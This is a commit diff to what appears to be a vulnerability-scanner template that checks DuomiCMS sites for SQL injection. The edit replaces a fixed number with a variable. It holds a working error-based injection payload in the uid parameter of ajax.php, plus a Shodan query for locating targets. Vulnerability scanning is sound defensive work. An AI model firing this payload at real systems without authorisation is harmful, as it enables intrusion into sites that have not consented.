Update duomicms-sql-injection.yaml
parent
a5e29b684a
commit
8ab77083cc
|
@ -10,17 +10,20 @@ info:
|
|||
verified: true
|
||||
shodan-query: title:"DuomiCMS"
|
||||
tags: duomicms,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
|
||||
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{{md5(9999999999)}}'
|
||||
- '{{md5({{num}})}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue